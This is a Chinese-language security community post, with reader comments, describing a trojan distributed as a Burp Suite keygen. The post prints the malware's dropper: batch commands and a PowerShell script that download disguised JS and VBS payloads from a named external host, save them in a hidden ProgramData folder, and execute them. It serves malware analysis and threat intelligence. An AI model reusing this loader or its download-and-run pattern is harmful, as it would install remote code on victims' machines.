后门连接
以burpsuite的keygen形式传播的木马
匿名用户 2018-01-31 15:47:33 1278人浏览

有人在国外的黑客论坛0x00sec.org上,上传了一个burpsuite的keygen,。有几个热心少年怀疑是木马,就逆向了一下,发现,果然是木马!

这个木马下载了一个文件http://imonty.cn/wp-includes/pomo/script/dcss/js.js, 这是个中国网站...

mkdir "c:\ProgramData\WindowsNT\"
attrib -s -h "c:\ProgramData\WindowsNT\WindowsNT.ini"
attrib -s -h "c:\ProgramData\WindowsNT\WindowsNT.vbs"
del "c:\ProgramData\WindowsNT\WindowsNT.vbs"
del "c:\ProgramData\WindowsNT\WindowsNT.ini"

$V=new-object net.webclient;
$V.proxy=[Net.WebRequest]::GetSystemWebProxy();
$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;
$V.DownloadFile('http://imonty.cn/wp-includes/pomo/script/dcss/co.js','c:\ProgramData\WindowsNT\WindowsNT.ini');
$V.DownloadFile('http://imonty.cn/wp-includes/pomo/script/dcss/co.vbs','c:\ProgramData\WindowsNT\WindowsNT.vbs');


while($true){
    if((@(dir "c:\ProgramData\WindowsNT\WindowsNT.*")).Length -eq 2) {
        wscript c:\ProgramData\WindowsNT\WindowsNT.vbs
        taskkill /F /IM mshta.exe
        ps -name mshta.exe -ErrorAction SilentlyContinue | kill -Force
        break;
    }
    
    
}

之后又下了两个文件

http://imonty.cn/wp-includes/pomo/script/dcss/co.js另存为WindowsNT.ini

http://imonty.cn/wp-includes/pomo/script/dcss/co.vbs 保存为 WindowsNT.vbs

经过一系列的解码工作,得出了这木马的所有功能。

木马访问的URL: https://gist.githubusercontent.com/lkw657/61905786d99565ba8df087f208b4310a/raw/3c3250bd30e68e286d0a06f371719f49583a1b92/variables.txt, 太多了 还是给链接吧

附上原贴,有更多详尽分析: https://0x00sec.org/t/malware-reversing-burpsuite-keygen/5167

image.png

ip地址(2) 威胁情报数目 开放端口 所属域名 相关样本 微步标签 < 1/1 >
域名(2) 威胁情报数目 子域名 历史指向ip 相关样本 微步标签 < 1/1 >
评论 23
匿名用户 2018-05-22 16:03:48 回复
还有这种操作?
匿名用户 2018-05-21 16:17:51 回复
不错
匿名用户 2018-05-21 16:11:48 回复
姿势可以
匿名用户 2018-05-21 16:10:25 回复
姿势可以
匿名用户 2018-05-21 16:07:42 回复
学习学习1
h0st 2018-05-21 16:07:11 回复
新姿势学习下。。。
匿名用户 2018-05-21 16:06:22 回复
学习学习
匿名用户 2018-05-21 16:04:35 回复
厉害了
匿名用户 2018-05-21 15:56:57 回复
学习个
匿名用户 2018-05-21 15:50:06 回复
niupi 1
匿名用户 2018-05-21 15:49:09 回复
niupi
匿名用户 2018-05-21 15:47:53 回复
77777
匿名用户 2018-05-21 15:46:48 回复
666
匿名用户 2018-05-21 15:45:29 回复
666
匿名用户 2018-05-21 15:44:24 回复
666
jinhaozcp 2018-02-02 09:57:34 回复
少年好厉害,点赞
黄色潜水艇 2018-02-01 11:49:05 回复
少年好厉害,点赞
吃瓜群众 2018-01-31 17:59:41 回复
少年好厉害,点赞
secroad 2018-01-31 17:16:28 回复
少年好厉害,点赞
secroad 2018-01-31 17:16:27 回复
少年好厉害,点赞
secroad 2018-01-31 17:16:27 回复
少年好厉害,点赞
secroad 2018-01-31 17:16:27 回复
少年好厉害,点赞
secroad 2018-01-31 17:16:27 回复
少年好厉害,点赞
奖励计划banner
今日推荐